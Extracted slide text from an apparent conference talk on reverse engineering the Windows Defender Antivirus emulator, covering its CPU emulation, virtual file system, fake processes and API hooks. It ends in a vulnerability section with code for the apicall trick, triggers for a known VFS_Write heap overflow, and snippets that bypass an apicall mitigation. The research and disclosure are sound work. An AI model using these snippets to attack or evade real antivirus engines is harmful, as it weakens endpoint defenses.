 ● Related to Windows Defender ATP, or any technologies under the Windows Defender name Outline 1. Introduction a. Background b. Introduction to Emulation 2. Tooling & Process 3. Reverse Engineering 4. Vulnerability Research 5. Conclusion Why Windows Defender Antivirus Windows’ built-in antivirus software: ● Now the “Defender” name covers multiple mitigations and security controls built into Windows ● This presentation is about Windows Defender Antivirus, not Windows Defender ATP, Application Guard, Exploit Guard, etc… Why Windows Defender Antivirus ● Huge AV market share - “8% of systems running Windows 7 and Windows 8 are running Windows Defender and more than 50% of Windows 10 devices”* *windowsreport.com/windows-defender-enterprise-antivirus/ Windows’ built-in antivirus software: ● Now the “Defender” name covers multiple mitigations and security controls built into Windows ● This presentation is about Windows Defender Antivirus, not Windows Defender ATP, Application Guard, Exploit Guard, etc… Why Windows Defender Antivirus ● Huge AV market share - “8% of systems running Windows 7 and Windows 8 are running Windows Defender and more than 50% of Windows 10 devices”* *windowsreport.com/windows-defender-enterprise-antivirus/ ● Runs unsandboxed as NT AUTHORITY\SYSTEM ○ Exploit = initial RCE + privilege escalation + AV bypass ● Surprisingly easy for attackers to reach remotely Windows’ built-in antivirus software: ● Now the “Defender” name covers multiple mitigations and security controls built into Windows ● This presentation is about Windows Defender Antivirus, not Windows Defender ATP, Application Guard, Exploit Guard, etc… ● Tavis and co. at P0 dropped some awesome Defender bugs
 ● I had analyzed AVs before, but never Windows Defender
 ● I reversed Defender’s JS engine for ~4 months, then got interested in the Windows emulator
 ● My personal research side project during winter 2017-2018: ~5 months of reversing, another month documenting Motivation Target - mpengine.dll mpam-fe.exe released monthly: ● mpengine.dll
 “Microsoft Malware Protection Engine” Also bundles 4 other binaries
 ● MPSigStub.exe
 “Microsoft Malware Protection Signature Update Stub”
 ● mpasbase.vdm ● mpasdlta.vdm 
 ● mpavbase.vdm ● mpavdlta.vdm 32 & 64-bit builds mpengine.dll provides malware scanning and detection capabilities - other AV features and OS integration are handled in Defender’s other components My Prior Research: Windows Defender’s JavaScript Engine Presented at REcon Brussels (Belgium), February 2018 bit.ly/
 2qio857 JS Engine bit.ly/2qio857 JS engine used for analysis of potentially malicious code - reversed from binary JS Engine bit.ly/2qio857 JS engine used for analysis of potentially malicious code - reversed from binary Custom loader / shell used for dynamic experimentation - thanks Rolf Rolles! JS Engine bit.ly/2qio857 JS engine used for analysis of potentially malicious code - reversed from binary Custom loader / shell used for dynamic experimentation - thanks Rolf Rolles! AV instrumentation callbacks JS Engine bit.ly/2qio857 JS engine used for analysis of potentially malicious code - reversed from binary Custom loader / shell used for dynamic experimentation - thanks Rolf Rolles! AV instrumentation callbacks Security at the cost of performance Related Work ● Only a handful of prior publications on binary reversing of antivirus software ● Lots of conference talks, whitepapers, and blogs on antivirus evasion, including against emulators ○ AVLeak with fellow RPI researchers Jeremy Blackthorne, Andrew Fasano, Patrick Biernat, and Dr. Bülent Yener - side channel-based black box emulator fingerprinting *AV industry companies have occasionally presented on the design of their emulators at conferences. Industry patents also often have interesting information about AV internals. ● As far as I know, there’s never been a publication about reverse engineering the internals of an AV emulator* ● Tavis Ormandy’s Defender bugs from 2017 Outline 1. Introduction a. Background b. Introduction to Emulation 2. Tooling & Process 3. Reverse Engineering 4. Vulnerability Research 5. Conclusion Why Emulate? Traditional AV model: scan files and look for known malware signatures (file hashes, sequences of bytes, file traits, etc…) Why Emulate? Traditional AV model: scan files and look for known malware signatures (file hashes, sequences of bytes, file traits, etc…) Problem: signatures are easily evaded with packed code, novel binaries, etc Why Emulate? Traditional AV model: scan files and look for known malware signatures (file hashes, sequences of bytes, file traits, etc…) a.k.a: ● sandboxing ● heuristic analysis ● dynamic analysis ● detonation ● virtualization Problem: signatures are easily evaded with packed code, novel binaries, etc Solution: run unknown binaries in a virtual emulated environment - look for runtime malicious behavior or known signatures ● Not a new idea, in use for at least 15 years Emulation Overview CPU Emulation OS (Kernel) Emulation Persistent System State Malware Binary AV Instrumentation Other Scanning Engines In-Emulator OS Facilities nt!PEB Settings mpengine.dll Emulation Overview ● Load unknown potentially malicious binary CPU Emulation OS (Kernel) Emulation Persistent System State Malware Binary AV Instrumentation Other Scanning Engines In-Emulator OS Facilities nt!PEB Settings mpengine.dll Emulation Overview ● Load unknown potentially malicious binary ● Begin running from entrypoint, and run until termination condition CPU Emulation OS (Kernel) Emulation Persistent System State Malware Binary AV Instrumentation Other Scanning Engines In-Emulator OS Facilities nt!PEB Settings mpengine.dll Emulation Overview ● Load unknown potentially malicious binary ● Begin running from entrypoint, and run until termination condition ○ Time CPU Emulation OS (Kernel) Emulation Persistent System State Malware Binary AV Instrumentation Other Scanning Engines In-Emulator OS Facilities nt!PEB Settings mpengine.dll Emulation Overview ● Load unknown potentially malicious binary ● Begin running from entrypoint, and run until termination condition ○ Time ○ Number of instructions CPU Emulation OS (Kernel) Emulation Persistent System State Malware Binary AV Instrumentation Other Scanning Engines In-Emulator OS Facilities nt!PEB Settings mpengine.dll Emulation Overview ● Load unknown potentially malicious binary ● Begin running from entrypoint, and run until termination condition ○ Time ○ Number of instructions ○ Number of API calls CPU Emulation OS (Kernel) Emulation Persistent System State Malware Binary AV Instrumentation Other Scanning Engines In-Emulator OS Facilities nt!PEB Settings mpengine.dll Emulation Overview ● Load unknown potentially malicious binary ● Begin running from entrypoint, and run until termination condition ○ Time ○ Number of instructions ○ Number of API calls ○ Amount of memory used CPU Emulation OS (Kernel) Emulation Persistent System State Malware Binary AV Instrumentation Other Scanning Engines In-Emulator OS Facilities nt!PEB Settings mpengine.dll Emulation Overview ● Load unknown potentially malicious binary ● Begin running from entrypoint, and run until termination condition ○ Time ○ Number of instructions ○ Number of API calls ○ Amount of memory used ○ etc... 
 CPU Emulation OS (Kernel) Emulation Persistent System State Malware Binary AV Instrumentation Other Scanning Engines In-Emulator OS Facilities nt!PEB Settings mpengine.dll Emulation Overview ● Load unknown potentially malicious binary ● Begin running from entrypoint, and run until termination condition ○ Time ○ Number of instructions ○ Number of API calls ○ Amount of memory used ○ etc... 
 ● Collect heuristic observations about runtime behavior, look for signatures in memory or dropped to disk, etc... CPU Emulation OS (Kernel) Emulation Persistent System State Malware Binary AV Instrumentation Other Scanning Engines In-Emulator OS Facilities nt!PEB Settings mpengine.dll Outline 1. Introduction 2. Tooling & Process 3. Reverse Engineering 4. Vulnerability Research 5. Conclusion Static Analysis ● ~12 MB DLL ● ~30,000 functions ● IDA Pro ○ Patch analysis with BinDiff ● Microsoft publishes PDBs Dynamic Analysis & Loader “Repeated vs. single-round games in security” Halvar Flake, BSides Zurich Keynote AV-Specific Challenges: ● Protected Process ○ Cannot debug, even as local admin ● Introspection ● Scanning on demand ● Code reachability may be configuration / heuristics dependent Dynamic Analysis & Loader “Repeated vs. single-round games in security” Halvar Flake, BSides Zurich Keynote AV-Specific Challenges: ● Protected Process ○ Cannot debug, even as local admin ● Introspection ● Scanning on demand ● Code reachability may be configuration / heuristics dependent Solution: Custom loaders for AV binaries Tavis Ormandy’s loadlibrary git.io/fbp0X ● PE loader for Linux ○ Shim out implementations for Windows API imports ○ Only implements the bare minimum to get mpengine.dll running, not a general purpose Windows emulator or Wine replacement ● mpclient tool exposes the main scanning interface ○ I built ~3k LoC of additional tooling on top of mpclient mpclient git.io/fbp0X Linux mpclient Binary mpclient git.io/fbp0X Linux mpclient Binary MpEngine.dll mpclient git.io/fbp0X Linux mpclient Binary MpEngine.dll IAT WinAPI Emulation mpclient git.io/fbp0X Linux mpclient Binary MpEngine.dll IAT Emulator WinAPI Emulation g_syscalls OutputDebugStringA WinExec ... mpclient git.io/fbp0X Linux mpclient Binary MpEngine.dll IAT Emulator WinAPI Emulation Malware Binary MZ... g_syscalls OutputDebugStringA WinExec ... mpclient git.io/fbp0X Linux mpclient Binary MpEngine.dll IAT __rsignal Emulator WinAPI Emulation Malware Binary MZ... g_syscalls OutputDebugStringA WinExec ... mpclient git.io/fbp0X Linux mpclient Binary MpEngine.dll IAT __rsignal Emulator WinAPI Emulation Malware Binary MZ... g_syscalls OutputDebugStringA WinExec ... Scanning Engine Selection mpclient git.io/fbp0X Linux mpclient Binary MpEngine.dll IAT __rsignal Emulator WinAPI Emulation Malware Binary MZ... g_syscalls OutputDebugStringA WinExec ... Scanning Engine Selection mpclient git.io/fbp0X Linux mpclient Binary MpEngine.dll IAT __rsignal Emulator WinAPI Emulation Threat Virus: Win32/Virut.BN!dam identified. Malware Binary MZ... g_syscalls OutputDebugStringA WinExec ... Scanning Engine Selection Demo Scanning with mpclient Dynamic Analysis - Code Coverage ● Getting an overview of what subsystems are being hit is helpful in characterizing a scan or emulation session ○ Breakpoints are too granular ● Emulator has no output other than malware identification ● Lighthouse code coverage plugin for IDA Pro from Markus Gaasedelen of Ret2 Systems / RPISEC Halvar Flake’s SSTIC 2018 keynote Outline 1. Introduction 2. Tooling & Process 3. Reverse Engineering a. Startup b. CPU Emulation c. Instrumentation d. Windows Emulation & Environment 4. Vulnerability Research 5. Conclusion Getting Emulated ● __rsignal function provides an entry point into Defender’s scanning - give it a buffer of data and it returns a malware classification
 ● Defender uses emulation to analyze executables it does not recognize with other less expensive analyses
 ● Emulation results are cached - a given binary will only be emulated once, even if scanned multiple times Emulator Initialization ● Allocate memory ● Initialize various objects and subsystems used during emulation ● Load the binary to be analyzed - relocate, resolve imports, etc ● Initialize virtual DLLs in the process memory space
 ● Heuristic observations about the binary are recorded - section alignment, number of imports, etc Outline 1. Introduction 2. Tooling & Process 3. Reverse Engineering a. Startup b. CPU Emulation c. Instrumentation d. Windows Emulation & Environment 4. Vulnerability Research 5. Conclusion CPU Emulation ● Support for many architectures ○ This presentation looks at x86 32-bit
 ● Technically dynamic translation, not “emulation” ○ Lift to IL, JIT compile to sanitized x86
 ● Architecture-specific software emulation functions handle unique or difficult to lift instructions ● The subsystem is incredibly complicated, and could be a full talk in its own right ○ Not a primary focus of this research and the subsystem I understand the least about DT_platform_x86_16 = 0n0 DT_platform_x86_32 = 0n1 DT_platform_x86_64 = 0n2 DT_platform_emu_IL = 0n3 DT_platform_NETRPF = 0n4 DT_platform_NETEmu = 0n5 DT_platform_DTlib32 = 0n6 DT_platform_DTlib64 = 0n7 DT_platform_VMProtect = 0n8 DT_platform_ARM = 0n9 DT_platform_count = 0n10 *_2_IL Lifting Individual architecture to IL lifting Grab the bytes of opcode, determine type, then emit IL accordingly Example: Single-byte x86 push register opcodes all map to type 0x13 x86_IL_translator::translate run_IL_emulator I did not observe this software IL emulator being invoked during my research ● Hypothesis: used for non-x86 host systems, e.g., Windows on ARM? eIL_ID_xor8 = 0n107 eIL_ID_xor16 = 0n108 eIL_ID_xor32 = 0n109 IL Emulation in Software Emulator can run IL bytecode in software
 IL-to-x86 JIT Translation lea opcode = 0x8d IL code can be translated to x86 and executed, a basic block at a time I observed this IL-to-x86 JIT being exercised during research Calls to esc[ape] functions are JITted for special handling of unique instructions Check out MSFT’s VB2005 paper Architecture-Specific esc Handlers Architecture-specific functions provide handling for unique architectural events and emulation of unique instructions x86_common_context::emulate_CPUID Architecture-specific software emulation for x86 CPUID instruction Code coverage provided by Lighthouse Outline 1. Introduction 2. Tooling & Process 3. Reverse Engineering a. Startup b. CPU Emulation c. Instrumentation d. Windows Emulation & Environment 4. Vulnerability Research 5. Conclusion Instrumenting mpengine Problem: little visibility into engine ● Coverage for the big picture, breakpoints for detailed observation
 Only output is malware detection Threat Virus: Win32/Virut.BN!dam identified. Instrumenting mpengine Problem: little visibility into engine ● Coverage for the big picture, breakpoints for detailed observation
 Only output is malware detection Threat Virus: Win32/Virut.BN!dam identified. Solution: a malware’s eye view ● mpengine.dll has functions that are invoked when our malware calls certain Windows APIs ● Create a binary to explore the AV from inside - hook and reuse existing functions to share that view with us on the outside mpclient git.io/fbp0X Linux mpclient Binary MpEngine.dll IAT __rsignal Emulator WinAPI Emulation Threat Virus: Win32/Virut.BN!dam identified. Malware Binary MZ... g_syscalls OutputDebugStringA WinExec ... Scanning Engine Selection Modified mpclient - ~3k LoC added github.com/0xAlexei Linux mpclient Binary MpEngine.dll IAT __rsignal WinAPI Emulation g_syscalls OutputDebugStringA WinExec ... Print to stdout OutputDebugStringA hook Other actions... WinExec hook Malware Binary MZ... Emulator Scanning Engine Selection OutputDebugStringA Hook Use existing functions in Defender to interact with function parameters and virtual memory Mark - Thanks for the idea! Hook the native function pointer that gets called when OutputDebugStringA is called in-emulator OutputDebugStringA Hook OutputDebugStringA Hook Declaration - void * for pe_vars_t * OutputDebugStringA Hook Declaration - void * for pe_vars_t * Local variable to hold parameters - same as Parameters<1> OutputDebugStringA Hook Declaration - void * for pe_vars_t * Local variable to hold parameters - same as Parameters<1> Pull parameters off of the virtual stack by calling Parameters<1> function inside mpengine.dll Parameters are just addresses within the emulator’s virtual memory OutputDebugStringA Hook Declaration - void * for pe_vars_t * Local variable to hold parameters - same as Parameters<1> Pull parameters off of the virtual stack by calling Parameters<1> function inside mpengine.dll Parameters are just addresses within the emulator’s virtual memory GetString calls into mpengine.dll functions which translate an emulator virtual memory address (the parameter) into a real pointer OutputDebugStringA Hook Declaration - void * for pe_vars_t * Local variable to hold parameters - same as Parameters<1> Pull parameters off of the virtual stack by calling Parameters<1> function inside mpengine.dll Parameters are just addresses within the emulator’s virtual memory GetString calls into mpengine.dll functions which translate an emulator virtual memory address (the parameter) into a real pointer Now we can just print the string to stdout Demo Hooking OutputDebugStringA myapp.exe Factors That Can Prevent Emulation:* ● Simplicity / lack of code entropy ● Linking against unsupported DLLs ● Calling unsupported functions ● Optimizations using complex instructions ● Targeting overly modern Windows builds
 Solutions: ● Add in junk code ● Strip down linkage to bare minimums ● Disable all optimizations ● Define your own entry point ● Target old Windows versions *These are problems for AV emulators in general in my experience. Defender seems more flexible than others, but I did still have to massage compiler settings to get a consistently emulated binary I/O communication with outside the emulator by calling OutputDebugStringA and other hooked functions Malware Binary Outline 1. Introduction 2. Tooling & Process 3. Reverse Engineering a. Startup b. CPU Emulation c. Instrumentation d. Windows Emulation & Environment 4. Vulnerability Research 5. Conclusion Windows Emulation & Environment 1. Usermode Environment 2. Usermode Code 3. User-Kernel Interaction 4. Kernel Internals 5. AV Instrumentation Virtual File System Contents Dump file system contents with a similar trick to the OutputDebugStringA hook - just pass void pointers to arbitrary data
 ● 1455 files on the 2/28/18 build ○ Whole FS can be dumped in a second or two ● Mostly fake executables ● A handful of fake config files ● Various text “goat” files ● Lots of empty files Demo Dumping The File System C:\\aaa_TouchMeNot_.txt Fake Config Files C:\\Mirc\mirc.ini [chanfolder] n0=#Blabla n1=#End C:\\Mirc\script.ini [script] ; blabla C:\\Windows\msdfmap.ini [connect default] Access=NoAccess [sql default] Sql=" " [connect CustomerDatabase] Access=ReadWrite Connect="DSN=AdvWorks" [sql CustomerById] Sql="SELECT * FROM Customers WHERE CustomerID = ?" [connect AuthorDatabase] Access=ReadOnly Connect="DSN=MyLibraryInfo;UID=MyUserID;PWD=MyPassword" [userlist AuthorDatabase] Administrator=ReadWrite [sql AuthorById] Sql="SELECT * FROM Authors WHERE au_id = ?" Virtual Registry Huge virtual registry with thousands of entries 1084 - svchost.exe 1268 - spoolsv.exe 1768 - explorer.exe 1796 - iexplore.exe 1800 - outlook.exe 1804 - msimn.exe 1808 - firefox.exe 1812 - icq.exe 1816 - yahoomessenger.exe 1820 - msnmsgr.exe 1824 - far.exe 1828 - trillian.exe 1832 - skype.exe 1836 - googletalk.exe 1840 - notepad.exe 1844 - wmplayer.exe 1848 - net.exe 1852 - spawned.exe 3904 - myapp.exe 0 - [System Process] 4 - System 356 - smss.exe 608 - csrss.exe 624 - winlogon.exe 676 - services.exe 680 - lsass.exe 700 - kav.exe 704 - avpcc.exe 708 - _avpm.exe 712 - avp32.exe 716 - avp.exe 720 - antivirus.exe 724 - fsav.exe 728 - norton.exe 732 - msmpeng.exe 736 - msmpsvc.exe 740 - mrt.exe 744 - outpost.exe 856 - svchost.exe Processes Various processes are shown as running on the system These are not real running processes, just names returned in order to present a realistic execution environment to malware “myapp.exe” is the name of the process under emulation - PID varies in different mpengine builds Demo Dumping The Process Listing Windows Emulation & Environment 1. Usermode Environment 2. Usermode Code 3. User-Kernel Interaction 4. Kernel Internals 5. AV Instrumentation Windows API Emulation Implemented just like the real Windows API - DLLs ● Symbols indicate they are called “vdlls” ● Present on disk and in memory in the emulator - like real Windows ● VDLLs are not present in mpengine.dll, must be dynamically loaded from VDMs Two types of Windows API functions: ● Stay in usermode → stay in the emulator ● Resolve to syscall → trap to native emulation Reversing VDLLs In-Emulator VDLL Emulations Computer name is “HAL9TH” ● In-emulator emulations stay within the emulator ● Code is run within the dynamic translation system ● Some emulations stub out to hardcoded returns Username is “JohnDoe” Stubbed Out Functions Complex functions are stubbed out to return hardcoded values or halt emulation RPCRT4.DLL mspaint.exe NTOSKRNL.EXE ws2_32.dll Winsock library is uniquely full of fingerprints - strings with “Mp” and German websites Windows Emulation & Environment 1. Usermode Environment 2. Usermode Code 3. User-Kernel Interaction 4. Kernel Internals 5. AV Instrumentation Native Emulation ● Complex functions that cannot be handled in-emulator must be emulated in native code ● Akin to usermode → kernel, or VM guest → host transitions ● Emulator to native transition implemented with a custom hypercall instruction - apicall 0x0F 0xFF 0xF0 [4 byte immediate] ● Stubs that apicall to various functions are included in VDLLs Emulated VDLL: kernel32! CopyFileWWorker Native code: mpengine!KERNEL32_DLL_CopyFileWWorker apicall apicall disassembly provided by an IDA Processor Extension Module g_syscalls dt mpengine!esyscall_t +0x0 proc : Ptr32 void +0x4 encrc : Uint4B apicall instruction use triggers dispatch to function pointer in g_syscalls table This is the table we modify when hooking OutputDebug
 StringA kernel32!OutputDebugStringA In-emulator VDLL code kernel32!OutputDebugStringA In-emulator VDLL code kernel32!OutputDebugStringA apicall In-emulator VDLL code Native emulation function Emulated VDLL Functions ADVAPI32 RegCreateKeyExW RegDeleteKeyW RegDeleteValueW RegEnumKeyExW RegEnumValueW RegOpenKeyExW RegQueryInfoKeyW RegQueryValueExW RegSetValueExW USER32 MessageBoxA
 KERNEL32 CloseHandle CopyFileWWorker CreateDirectoryW CreateFileMappingA CreateProcessA CreateToolhelp32Snapshot ExitProcess ExitThread FlushFileBuffers GetCommandLineA GetCurrentProcess GetCurrentProcessId GetCurrentThread GetCurrentThreadId GetModuleFileNameA GetModuleHandleA GetProcAddress GetThreadContext GetTickCount LoadLibraryW MoveFileWWorker MpAddToScanQueue MpCreateMemoryAliasing MpReportEvent MpReportEventEx MpReportEventW MpSetSelectorBase OpenProcess OutputDebugStringA ReadProcessMemory RemoveDirectoryW SetFileAttributesA SetFileTime Sleep TerminateProcess UnimplementedAPIStub VirtualAlloc VirtualFree VirtualProtectEx VirtualQuery WinExec WriteProcessMemory Emulated ntdll.dll Functions MpGetSelectorBase MpUfsMetadataOp NtCloseWorker NtContinue NtControlChannel NtCreateEventWorker NtCreateFileWorker NtCreateMutantWorker NtCreateSemaphoreWorker NtCreateThreadWorker NtDeleteFileWorker NtDuplicateObjectWorker NtGetContextThread NtOpenEventWorker NtOpenMutantWorker NtOpenSemaphoreWorker NtOpenThreadWorker NtPulseEventWorker NtQueryInformationFileWorker NtQueryInformationThreadWorker NtReadFileWorker NtReleaseMutantWorker NtReleaseSemaphoreWorker NtResetEventWorker NtResumeThreadWorker NtSetContextThread NtSetEventWorker NtSetInformationFileWorker NtSetLdtEntries NtSuspendThreadWorker NtTerminateThreadWorker NtWaitForMultipleObjectsWorker_PostBlock NtWaitForMultipleObjectsWorker_PreBlock NtWriteFileWorker ObjMgr_ValidateVFSHandle ThrdMgr_GetCurrentThreadHandle ThrdMgr_SaveTEB ThrdMgr_SwitchThreads VFS_CopyFile VFS_DeleteFile VFS_DeleteFileByHandle VFS_FileExists VFS_FindClose VFS_FindFirstFile VFS_FindNextFile VFS_FlushViewOfFile VFS_GetAttrib VFS_GetHandle VFS_GetLength VFS_MapViewOfFile VFS_MoveFile VFS_Open VFS_Read VFS_SetAttrib VFS_SetCurrentDir VFS_SetLength VFS_UnmapViewOfFile VFS_Write Native Emulation Functions Native emulation functions all take parameter pe_vars_t *, ~½mb large struct containing entire emulation session context Native Emulation Functions Native emulation functions all take parameter pe_vars_t *, ~½mb large struct containing entire emulation session context Templated Parameters functions retrieve parameters to the function from the emulated stack Native Emulation Functions Native emulation functions all take parameter pe_vars_t *, ~½mb large struct containing entire emulation session context Templated Parameters functions retrieve parameters to the function from the emulated stack Return values, register state, CPU tick count, etc, are managed through various functions that manipulate pe_vars_t Interacting With Virtual Memory mmap functions allow access to the emulated memory space Interface similar to Unicorn Engine and other similar tools Interacting With Virtual Memory mmap functions allow access to the emulated memory space Interface similar to Unicorn Engine and other similar tools Wrapper functions around these functions make common operations easier Windows Emulation & Environment 1. Usermode Environment 2. Usermode Code 3. User-Kernel Interaction 4. Kernel Internals 5. AV Instrumentation Windows Kernel Emulation Windows kernel facilities are emulated with native code
 ● Object Manager ● Process management ● File system ● Registry ● Synchronization primitives Object Manager ● The Object Manager is an essential part of the Windows Executive - provides kernel mode resource management - processes, files, registry keys, mutexes, etc
 ● Defender supports 5 types of objects: File, Thread, Event, Mutant (Mutex), Semaphore
 ● Manages system state during emulation that is persistent between native emulation API calls Object Manager Types Objects are stored in a map, tracked by pid and handle Objects identify themselves by C++ virtual method call, RTTI is used to cast from ObjectManager::Object to specific subclasses dt mpengine!ObjectManager::Object +0x0 __VFN_table : Ptr32 +0x4 m_openCount : Uint4B +0x8 m_isPersistent : Bool +0x9 m_canDelete : Bool +0xa m_signal : Bool dt mpengine! ObjectManager::FileObject +0x0 __VFN_table : Ptr32 +0x4 m_openCount : Uint4B +0x8 m_isPersistent : Bool +0x9 m_canDelete : Bool +0xa m_signal : Bool +0xc m_fileHandle : Uint4B +0x10 m_accessMode : Uint4B +0x14 m_shareAccess: Uint4B +0x18 m_cursor : Uint4B dt mpengine!ObjectManager::MutantObject +0x0 __VFN_table : Ptr32 +0x4 m_openCount : Uint4B +0x8 m_isPersistent : Bool +0x9 m_canDelete : Bool +0xa m_signal : Bool +0xc m_ownerThrdId : Uint4B +0x10 m_isAbandoned: Uint4B +0x14 m_waitCount : Uint4B 5 types of object: 1. File 2. Thread 3. Event 4. Mutant (Mutex) 5. Semaphore Stored in memory as C++ objects Object Manager Integration The Object Manager manages persistent system state during an emulation session NTDLL_DLL_NtSetInformationFileWorker NTDLL_DLL_NtOpenMutantWorker Object Manager Integration The Object Manager manages persistent system state during an emulation session NTDLL_DLL_NtSetInformationFileWorker Current process handle is emulated as 0x1234 NTDLL_DLL_NtOpenMutantWorker VFS - Virtual File System ● Native emulation functions are filed under NTDLL (but accessible from multiple VDLLs via apicall stubs) ● NTDLL_DLL_VFS_* functions do administrative work before calling into internal VFS_* functions that actually engage with the virtual file system, calling its methods to manipulate contents ● NTDLL Nt* emulation functions that interact with the file system call down into VFS_* functions after checking / normalizing / sanitizing inputs VFS-Specific Native Emulations ObjMgr_ValidateVFSHandle VFS_CopyFile VFS_DeleteFile VFS_DeleteFileByHandle VFS_FileExists VFS_FindClose VFS_FindFirstFile VFS_FindNextFile VFS_FlushViewOfFile VFS_GetAttrib VFS_GetHandle VFS_GetLength VFS_MapViewOfFile VFS_MoveFile VFS_Open VFS_Open VFS_Read VFS_SetAttrib VFS_SetCurrentDir VFS_SetLength VFS_UnmapViewOfFile VFS_Write dt mpengine!pe_vars_t ... +0x241e0 vfs : Ptr32 VirtualFS +0x241e4 vfsState : Ptr32 VfsRunState +0x241e8 vfsNumVFOs : Uint4B +0x241ec vfsVFOSizeLimit : Uint4B +0x241f0 vfsRecurseLimit : Uint4B +0x241f4 vfsFlags : Uint4B ... Windows Emulation & Environment 1. Usermode Environment 2. Usermode Code 3. User-Kernel Interaction 4. Kernel Internals 5. AV Instrumentation Defender Internal Functions MpAddToScanQueue Queue up a file (e.g., a dropped binary) for scanning MpCreateMemoryAliasing Alias memory in emulator MpReportEvent, MpReportEvent{Ex,W} Report malware behavior to inform heuristic detections Mp{Get,Set}SelectorBase Get/set segment registers (CS, DS, ES, etc) MpUfsMetadataOp Get/set metadata about the file being scanned NtControlChannel IOCTL-like administration for the AV engine Internal administration and configuration functions accessible via apicall MpReportEvent Used to communicate information about malware binary actions with Defender’s heuristic detection engine MpReportEvent MpReportEvent - AV Processes Emulated process information is stored in a data structure in the kernel32.dll VDLL and presented when enumerated Processes types are grouped by PID - processes for antivirus software has 700 PIDs 700 - kav.exe 704 - avpcc.exe 708 - _avpm.exe 712 - avp32.exe 716 - avp.exe 720 - antivirus.exe 724 - fsav.exe 728 - norton.exe 732 - msmpeng.exe 736 - msmpsvc.exe 740 - mrt.exe 744 - outpost.exe Calling TerminateProcess on an AV product triggers an MpReportEvent call 1 set attribute set_static_unpacking 14 get arbitrary attribute substring 2 delete attribute store pea_disable_static_unpacking 15 set pe_vars_t->max_respawns value 3 get mpengine.dll version number 16 modify register state (?) 4 set attribute set_pea_enable_vmm_grow 17 set arbitrary attribute 5 set attribute set_pea_deep_analysis 18 load microcode 6 set attribute set_pea_hstr_exhaustive 19 set breakpoint 7 set attribute set_pea_aggressiveimport 20 retrieve get_icnt_inside_loop value 8 set attribute set_pea_skip_unimplemented_opc 21 some sort of domain name signature check 9 set attribute pea_skip_unimplemented_opc 22 set pe_vars_t->internalapis 10 set attribute set_pea_disable_apicall_limit 23+24 switch_to_net32_proc (.NET) 11 get arbitrary attribute 25 get arbitrary pe attribute by number 12 check if malware is packed with a given packer 26-31 unimplemented 13 set attribute pea_disable_seh_limit 32 scan_msil_by_base NtControlChannel Options Outline 1. Introduction 2. Tooling & Process 3. Reverse Engineering 4. Vulnerability Research a. Understanding P0’s Vulnerabilities b. Bypassing Mitigations With apicall Abuse c. Fuzzing 5. Conclusion Tavis’ apicall Trick DWORD MpApiCall(PCHAR Module, PCHAR ProcName, ...) { DWORD Result; DWORD ApiCrc; ApiCrc = crcstr(Module) ^ crcstr(ProcName); _asm { mov eax, dword ptr ApiCrc mov [apicode], eax mov ebx, esp lea esp, ProcName _emit 0x0f ; apicall opcode _emit 0xff ; apicall opcode _emit 0xf0 ; apicall opcode apicode: _emit 0x00 ; apicall immediate _emit 0x00 ; apicall immediate _emit 0x00 ; apicall immediate _emit 0x00 ; apicall immediate mov esp, ebx mov Result, eax } return Result; } ● Build binary with a rwx .text section, generate apicall instruction on the fly as needed ● apicall instruction triggers native emulation functions from malware .text section with attacker controlled Tavis’ NtControlChannel Bug NtControlChannel(0x12,...) Tavis’ NtControlChannel Bug NtControlChannel(0x12,...) Tavis’ NtControlChannel Bug NtControlChannel(0x12,...) count is user controlled Tavis’ NtControlChannel Bug NtControlChannel(0x12,...) count is user controlled Patched with max 0x1000 count check Tavis’ VFS_Write Bug VFS_Write(Handle, Buf, 0, 0xffffffff, 0); VFS_Write(Handle, Buf, 0x7ff, 0x41414141, 0); VFS_Write( unsigned int hFile, char * pBuffer, unsigned int nBytesToWrite, unsigned int nOffset, unsigned int * pBytesWritten ); Heap OOB r/w: buffer gets extended to offset, but no space is allocated for it. r/w at arbitrary offsets then possible Outline 1. Introduction 2. Tooling & Process 3. Reverse Engineering 4. Vulnerability Research a. Understanding P0’s Vulnerabilities b. Bypassing Mitigations With apicall Abuse c. Fuzzing 5. Conclusion Locking Down apicall Can’t just trigger apicall from malware .text section or otherwise malware-created memory (eg: rwx allocation) anymore If apicall did not come from a VDLL, set a heuristic and deny it Proceed with processing if apicall is ok is_vdll_page call added to __call_api_by_crc in 6/20/2017 mpengine.dll build - is the apicall instruction coming from a VDLL? New AV heuristic trait added Bypass ● apicall stubs are located throughout VDLLs ● They can be located in memory and called directly by malware, with attacker controlled arguments ○ Passes is_vdll_page checks Response from Microsoft: “We did indeed make some changes to make this interface harder to reach from the code we’re emulating -however, that was never intended to be a trust boundary. Accessing the internal APIs exposed to the emulation code is not a security vulnerability...” Bypass Example 1 VOID OutputDebugStringA_APICALL(PCHAR msg) { typedef VOID(*PODS)(PCHAR); HMODULE k32base = LoadLibraryA(“kernel32.dll”); PODS apicallODS = (PODS)((PBYTE)k32base + 0x16d4e); apicallODS(msg); } Kernel32 base offset: 0x16d4e Comes from kernel32 VDLL, so passes is_vdll_page checks OutputDebugStringA can be normally hit from kernel32, so this is ultimately just a unique way of doing that Bypass Example 2 VOID NtControlChannel_APICALL() { typedef VOID(*PNTCC)(DWORD, PVOID); HMODULE k32base = LoadLibraryA(“kernel32.dll”); PNTCC apicallNTCC = (PNTCC)((PBYTE)k32base + 0x52004); apicallNTCC(0x11, “virut_body_found”); } Kernel32 base offset: 0x52004 Comes from kernel32 VDLL, so passes is_vdll_page checks NtControlChannel should not be exposed to malware running inside the emulator NtControlChannel(0x11,“virut_body_found”) triggers immediate malware detection Demo apicall abuse 1 set attribute set_static_unpacking 14 get arbitrary attribute substring 2 delete attribute store pea_disable_static_unpacking 15 set pe_vars_t->max_respawns value 3 get mpengine.dll version number 16 modify register state (?) 4 set attribute set_pea_enable_vmm_grow 17 set arbitrary attribute 5 set attribute set_pea_deep_analysis 18 load microcode 6 set attribute set_pea_hstr_exhaustive 19 set breakpoint 7 set attribute set_pea_aggressiveimport 20 retrieve get_icnt_inside_loop value 8 set attribute set_pea_skip_unimplemented_opc 21 some sort of domain name signature check 9 set attribute pea_skip_unimplemented_opc 22 set pe_vars_t->internalapis 10 set attribute set_pea_disable_apicall_limit 23+24 switch_to_net32_proc (.NET) 11 get arbitrary attribute 25 get arbitrary pe attribute by number 12 check if malware is packed with a given packer 26-31 unimplemented 13 set attribute pea_disable_seh_limit 32 scan_msil_by_base apicall Bypass Implications Fingerprint and manipulate the analysis environment and malware detection heuristics (NtControlChannel, MpReportEvent) Access to an attack surface with a known history of memory corruption vulnerabilities Seems very difficult to mitigate against abuse Outline 1. Introduction 2. Tooling & Process 3. Reverse Engineering 4. 